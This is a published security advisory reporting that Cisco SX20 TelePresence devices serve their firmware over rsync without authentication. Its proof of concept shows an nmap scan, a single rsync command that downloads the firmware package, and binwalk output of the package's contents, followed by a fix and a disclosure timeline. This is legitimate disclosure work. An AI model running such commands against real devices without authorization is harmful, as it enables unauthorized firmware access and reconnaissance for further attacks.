usd-2018-0035 | Cisco Unified Communications Manager (CallManager)/11.5.1.15900-18 (likely in all versions)

Advisory ID: usd-2018-0035
CVE Number: N/A
Affected Product: Unified Communications Manager
Affected Version: 11.5.1.15900-18 (likely in all versions)
Vulnerability Type: Exposure of Sensitive Configuration Data
Security Risk: Medium
Vendor URL: https://www.cisco.com
Vendor Status: „is not considered to be an exposure“

Description

usd discovered that Cisco SX20 devices allow attackers on the local network to download firmware using rsync without prior authentication. Access to the firmware enables attackers to specifically search for additional vulnerabilities within source code and configuration files.

The Cisco SX20 TelePresence Quick is a set of devices that can be used for video conferencing. Typically they are paired with a screen (e.g. a TV). The SX20 needs to connect to a local network to handle calls and exchange configuration data with the back-end (e.g. the Cisco UCM CallManager). This exposes the device to attackers on the local network.

Proof of Concept (PoC)

Let 10.10.10.10 be the IP address of a SX20 device.

An nmap scan identifies the following open services:

4043/tcp open rsync (protocol version 29)
4045/tcp open lockd?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, HTTPOptions, Kerberos, LPDString, NULL, TLSSessionReq, TerminalServer:
| version: ce9.4.1 6ae80e1f2ee 2018-08-14
| method: rsync
| url: rsync://[::ffff:10.10.10.10]:4043/idefix/idefix.pkg
|_ targets: 102300-3,102310-0,102310-1,101282-0

The following command will download the idefix.pkg file advertised by TCP port 4045:
# rsync rsync://[::ffff:10.10.10.10]:4043/idefix/idefix.pkg .

Using binwalk, the file is identified as a firmware package:
# binwalk idefix.pkg

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
3487 0xD9F PEM certificate
7324 0x1C9C Executable script, shebang: "/bin/sh"
13549 0x34ED Unix path: /sys/class/i2c-adapter/i2c-4/4-0054/eeprom@101:16
13613 0x352D Unix path: /sys/class/i2c-adapter/i2c-4/4-0054/eeprom@96:5
13672 0x3568 Unix path: /sys/class/gpio/gpio137/value
13808 0x35F0 Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 44345388 bytes, 5207 inodes, blocksize: 131072 bytes, created: 2018-08-14 13:16:20
44361273 0x2A4E639 uImage header, header size: 64 bytes, header CRC: 0x850DC982, created: 2018-01-22 11:38:34, image size: 210044 bytes, Data Address: 0x80E80000, Entry Point: 0x80E80000, data CRC: 0xEEA65CCC, OS: Firmware, CPU: ARM, image type: Firmware Image, compression type: none, image name: "CISCO firmware 32"
44496781 0x2A6F78D CRC32 polynomial table, little endian
44505174 0x2A71856 Android bootimg, kernel size: 1684103680 bytes, kernel addr: 0x616D6920, ramdisk size: 1830839655 bytes, ramdisk addr: 0x63696761, product name: "oo long"
44607241 0x2A8A709 CRC32 polynomial table, little endian
44612405 0x2A8BB35 uImage header, header size: 64 bytes, header CRC: 0xC37A01BA, created: 2018-06-05 12:33:35, image size: 20337280 bytes, Data Address: 0x0, Entry Point: 0x0, data CRC: 0xFCCAACDC, OS: Linux, CPU: ARM, image type: RAMDisk Image, compression type: gzip, image name: "CISCO ramdisk 20180605-3a15e0444CertISW"
44613317 0x2A8BEC5 gzip compressed data, from Unix, last modified: 2018-06-05 12:33:25
64949749 0x3DF0DF5 uImage header, header size: 64 bytes, header CRC: 0x1D587465, created: 2018-06-05 12:33:41, image size: 3791880 bytes, Data Address: 0x80008000, Entry Point: 0x80008000, data CRC: 0xC48327A1, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: "CISCO kernel 20180605-3a15e04445CertISW"
64967148 0x3DF51EC gzip compressed data, maximum compression, from Unix, NULL date (1970-01-01 00:00:00)
68741741 0x418EA6D Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 20941005 bytes, 878 inodes, blocksize: 131072 bytes, created: 2018-06-05 12:51:34
89684647 0x5587AA7 Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 553758 bytes, 192 inodes, blocksize: 131072 bytes, created: 2018-08-14 13:10:39

Please note that at the point of this writing, usd AG has not performed any additional firmware analysis.

Fix

Enable authentication for the rsync service or disable it if possible.

Timeline

  • 2018-10-31 Advisory has been sent to psirt@cisco.com
  • 2018-11-07 Cisco states that they they do not consider this to be an exposure
  • 2018-11-09 extended public disclosure deadline to 2019-01-23
  • 2019-01-23 Security advisory released

Credits

This security vulnerability was discovered by Marcus Gruber and Maximilian Boehner of usd AG.